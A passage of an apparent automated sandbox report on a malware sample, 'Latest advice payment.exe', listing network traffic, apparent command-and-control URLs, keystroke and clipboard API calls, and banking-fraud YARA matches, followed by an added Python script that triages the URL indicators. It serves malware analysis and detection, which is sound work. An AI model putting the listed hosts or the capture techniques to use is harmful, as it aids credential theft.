                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:14 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7vyIQgYeCQleSOWRI0XZtNLF8kqFlrdffjaihyJMmpO8P2MmknId7gI4wLHoWLJZiNM3vYl2t%2B92Ux%2Blx9n2eHIBH3d%2BdwaJS313hYLB2OpzLqT9ktwoWGOkNs3bZkOV5OLje3lHEhY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6fe8b3d358c15-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=793&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:17 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HS5drpFChwJ328d1XNN0it3lxzzDZlwcJI72QUKoQQUEqX%2F4oZekHZd0JvFPN5i3uar0%2FmYDU%2FOZM3bcG0xwADWXieDcwkcBbnbtQoOMUNh0M9HYO%2BeG3CXA6jlzYUchyOYQ971cp74%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6fe9c2af9efa7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1788&rtt_var=894&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1806&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:19 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yPf1IiQcliVuwc3mFxRJvJp8WgPKsXPOXeG9fGTrnLcPgY0y%2BXfBjUh%2F4yy2Pc0UkgVDGudBThhs1a%2FJSbFgEQjriNgwoeN4ufZAdvIQfyqeC59nW7Qly%2FbS7OK0g5ihVlU9hUBuINk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6feac9e3bf78d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1602&rtt_var=801&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=52&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store 
Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: svchost.exe, 00000002.00000003.2400399529.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400509585.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000002.3990744598.0000000000B68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://server/get.asp
                Source: bitsadmin.exe, 00000008.00000002.3991882171.000000000411C000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3993392825.00000000060D0000.00000004.00000800.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000002.3991649749.0000000003D5C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2
                Source: CWtKbasqHVKAO.exe, 0000000C.00000002.3993071436.00000000057B5000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.learnwithus.site
                Source: CWtKbasqHVKAO.exe, 0000000C.00000002.3993071436.00000000057B5000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.learnwithus.site/alu5/
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: bitsadmin.exe, 00000008.00000002.3991882171.0000000003C66000.00000004.10000000.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000002.3991649749.00000000038A6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: bitsadmin.exe, 00000008.00000002.3990678417.0000000002E4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live
                Source: bitsadmin.exe, 00000008.00000002.3990678417.0000000002E24000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: bitsadmin.exe, 00000008.00000003.2621680573.0000000007AF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: bitsadmin.exe, 00000008.00000002.3990678417.0000000002E24000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: bitsadmin.exe, 00000008.00000002.3990678417.0000000002E4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_i
                Source: bitsadmin.exe, 00000008.00000002.3990678417.0000000002E24000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: bitsadmin.exe, 00000008.00000002.3990124569.00000000005C0000.00000004.00000020.00040000.00000000.sdmp | String found in binary or memory: https://login.livnn
                Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005D4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005D3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005C001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005ECABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
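The URL rows above mix two very different things: the two short-path URLs (`/d9ku/?b6=...`, `/alu5/`) and `http://server/get.asp` that the report attributes to the injected svchost.exe, CWtKbasqHVKAO.exe and bitsadmin.exe processes, and a set of search-engine and login.live.com URLs in bitsadmin.exe memory that are most plausibly harvested browser-profile data (bitsadmin.exe is the process that later reads the Firefox profile and carries the Chrome `password_notes` schema string). The Python below is an added example, not Joe Sandbox output or code: it parses rows in this report's format, records which process index each URL was seen in, and separates candidate indicators from the browser-data noise. The allowlist of browser hosts and the short-path heuristic are my own assumptions chosen to fit the rows on this page, not something the report states.

```python
import re
from urllib.parse import urlsplit

# Constructed input: five "String found in binary or memory" rows copied from the
# report above (fused column separator and all) so the script runs offline.
REPORT_LINES = [
    "Source: svchost.exe, 00000002.00000003.2400399529.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, "
    "svchost.exe, 00000002.00000003.2400509585.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, "
    "CWtKbasqHVKAO.exe, 00000007.00000002.3990744598.0000000000B68000.00000004.00000020.00020000.00000000.sdmp"
    "String found in binary or memory: http://server/get.asp",
    "Source: bitsadmin.exe, 00000008.00000002.3991882171.000000000411C000.00000004.10000000.00040000.00000000.sdmp, "
    "bitsadmin.exe, 00000008.00000002.3993392825.00000000060D0000.00000004.00000800.00020000.00000000.sdmp, "
    "CWtKbasqHVKAO.exe, 0000000C.00000002.3991649749.0000000003D5C000.00000004.00000001.00040000.00000000.sdmp"
    "String found in binary or memory: http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2",
    "Source: CWtKbasqHVKAO.exe, 0000000C.00000002.3993071436.00000000057B5000.00000040.80000000.00040000.00000000.sdmp"
    "String found in binary or memory: http://www.learnwithus.site/alu5/",
    "Source: bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmp"
    "String found in binary or memory: https://duckduckgo.com/ac/?q=",
    "Source: bitsadmin.exe, 00000008.00000002.3990678417.0000000002E24000.00000004.00000020.00020000.00000000.sdmp"
    "String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033",
]

# Accepts both the fused form above and a "Source: ... | String found ..." form.
ROW_RE = re.compile(r"^Source:\s*(?P<src>.*?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)")
# A memory-dump id starts with the 8-hex-digit process index (00000008 -> process 8).
DUMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.")

# Assumption: hosts on this page that are explained by harvested browser profile /
# Microsoft account data rather than by the malware's own traffic.
KNOWN_BENIGN = {"duckduckgo.com", "www.ecosia.org", "cdn.ecosia.org", "ac.ecosia.org",
                "ch.search.yahoo.com", "login.live.com", "cdn-bj.trafficmanager.net"}

# Heuristic (mine, not from the report): a four-character directory, optionally with
# a single two-character query key, as in /d9ku/?b6=... and /alu5/ above.
SHORT_PATH_RE = re.compile(r"/[a-z0-9]{4}/(\?[a-z0-9]{2}=[A-Za-z0-9_-]+)?")


def parse_url_rows(lines):
    """Map each URL to the set of (process name, process index) it was found in."""
    found = {}
    for line in lines:
        m = ROW_RE.match(line)
        if not m:
            continue
        tokens = [t.strip() for t in m.group("src").split(",")]
        procs = set()
        for i, tok in enumerate(tokens):
            if tok.lower().endswith(".exe"):
                idx = None
                if i + 1 < len(tokens):
                    d = DUMP_RE.match(tokens[i + 1])
                    if d:
                        idx = int(d.group(1), 16)
                procs.add((tok, idx))
        found.setdefault(m.group("url"), set()).update(procs)
    return found


def is_short_path(url):
    """True when the path+query matches the short-directory heuristic above."""
    u = urlsplit(url)
    return SHORT_PATH_RE.fullmatch(u.path + ("?" + u.query if u.query else "")) is not None


def candidate_iocs(lines):
    """Hosts worth hunting: not explained by browser data, or matching the heuristic."""
    hosts = set()
    for url in parse_url_rows(lines):
        host = urlsplit(url).hostname or ""
        if host not in KNOWN_BENIGN or is_short_path(url):
            hosts.add(host)
    return sorted(hosts)


if __name__ == "__main__":
    for url, procs in parse_url_rows(REPORT_LINES).items():
        print(url, "<-", ", ".join(f"{n}[{i}]" for n, i in sorted(procs, key=str)))
    print("candidate IOCs:", candidate_iocs(REPORT_LINES))
```

Run it against the whole "String found in binary or memory" section rather than the five rows embedded here; the process index (the `[8]`, `[12]`) is what lets you tell a string the implant decrypted into its own memory from one that was read out of a browser database.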

                E-Banking Fraud

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.2433911205.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2435582129.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3993071436.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3990417322.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3991350388.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3990055319.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3990341919.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2436623897.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_00563B3A This is a third-party compiled AutoIt script.
                Source: Latest advice payment.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Latest advice payment.exe, 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
